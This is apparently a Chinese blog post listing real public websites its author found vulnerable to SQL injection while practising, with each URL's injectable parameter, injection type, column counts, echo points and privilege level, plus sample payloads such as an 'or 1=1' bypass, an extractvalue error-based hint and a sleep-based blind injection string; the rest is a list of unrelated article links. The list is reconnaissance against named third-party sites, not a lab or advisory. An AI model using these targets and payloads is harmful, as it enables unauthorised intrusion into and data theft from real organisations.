当前位置：首页 > news >正文

存在sql注入的公网站点

news 2025/7/8 20:27:19

此数据为博主在新手阶段练习sql注入时发现的站点，漏洞可能修复，备注可能错误

url: https://www.uni-1.com.hk/about_en.php?id=2
注入点类型：数值
sql报错回显：无
sql语句执行：[order by] [union]
字段数：14
回显点：12，13，14

url: https://atmos.mora.com.pl/blank.php?id=19088
注入点类型：数值
sql报错回显：无
sql语句执行：顺利
回显点：1，2，3
用户权限：低

https://www.csi-india.org/news/index.php?id=18
注入点类型：数值
sql报错回显：无
sql语句执行：顺利
字段数：8
回显点：3，4，5，6

http://jwsm.cc/blank.php?id=136
注入点类型：num
sql报错回显：无
权限：普通

https://esjindex.org/search.php?id=2
注入点类型：字符
异常载荷：'
sql报错回显：存在
字段：22
union联合查询失效
sleep判断失效

http://www.qdbohai.com/project/list.php
注入点类型：搜索框
传参类型：post传参
输出[all]载荷：keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入点类型：数值
传参类型：get
sql报错回显：存在
回显点：存在
sql报错盲注载荷：exreactvalue

url：https://www.zenith.edu.hk/tc/school.php?id=35
注入点：id=35
类型：str
sql报错回显：存在
页面回显：无，页面自动跳转
sql报错盲注载荷：exreactvalue
comment：union非法混合，

url：https://abp.bzh/article.php?id=31347
类型：str
sql报错回显：存在
页面回显：无
注入方式：sleep延时盲注
comment：order by失效，union失效
盲注载荷：' and if((length(database()))=13,sleep(0),sleep(5)) --+

url：https://www.ciritas.ru/faq2.php?id=2
类型：str

url：https://uppo.pt/announce.php?id=136
类型：str
sql报错回显：无
字段数：19
comment：union失效，403

url：https://www.spbigbag.com/news_view.php?id=1
类型：str

查看全文

http://www.lryc.cn/news/473767.html

linux之网络子系统- 内核发送数据包流程以及相关实际问题

UDP 实现的 Echo Server 和 Echo Client 回显程序

AUTOSAR CP MCAL微控制器抽象层介绍

SpringBoot应用部署到Docker中MySQL8时间戳相差8小时问题及处理方式

飞桨首创 FlashMask ：加速大模型灵活注意力掩码计算，长序列训练的利器

【含文档+源码】基于SpringBoot+Vue的新型吃住玩一体化旅游管理系统的设计与实现

【网络安全】揭示 Web 缓存污染与欺骗漏洞

设计模式07-结构型模式(装饰模式/外观模式/代理模式/Java)

C# 广播技术——发现局域网设备技术——

【QA】windows和linux陷入系统调用后有什么区别？

Github 2024-11-01 开源项目月报 Top19

Python实现深度学习模型预测控制（tensorflow）DL-MPC（Deep Learning Model Predictive Control

Anki插件Export deck to html的改造

csdn 记载文章十分缓慢

python通过pyperclip库操作剪贴板

LSTM——长短期记忆神经网络

10进阶篇：运用第一性原理解答“是什么”类型题目

【elkb】索引生命周期管理

江协科技STM32学习- P25 UART串口协议

15分钟学 Go 第 22 天：包的使用

【Leecode】Leecode刷题之路第35天之搜索插入位置

速盾：海外cdn高防

图书管理系统（JDBC）

模板初阶及STL简介

UE5 不同的编译模式下，module的组织形式

相关文章：